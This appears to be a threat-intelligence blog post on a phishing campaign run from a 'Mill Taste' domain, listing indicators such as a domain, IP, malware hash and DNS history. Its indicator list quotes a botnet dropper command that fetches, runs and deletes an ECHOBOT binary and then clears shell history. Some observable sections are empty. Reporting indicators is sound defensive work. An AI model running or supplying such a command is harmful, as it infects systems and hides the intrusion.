An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.  The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice.  In fact, it has attached a PDF and is coming with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware which will be described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled “” at IP:  From the DNS history tracked by [redacted] it appears that the initial test run of the malicious infrastructure was on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

The same Splash page for all three of these events is showing as the same ‘Welcome!’ placeholder.

According to the [redacted] tool the autonomous system network for the above noted IP is:  AS202425 which is exhibiting multiple security issues including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact as documented on [redacted] was the following WIN32 executable:  scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9).As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic”  “downloader” and a “Grandcrab.AF” Trojan.

As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous “communicating” and referring nodes also associated with the .zz node identified by [redacted] as Hanover Hospital.  The Cyber Observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables


Communicating Nodes Cyber Observables

7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,,,,,,,,,,,,*,, /tmp; wget; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,,,,,,,

By Jane

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Translate »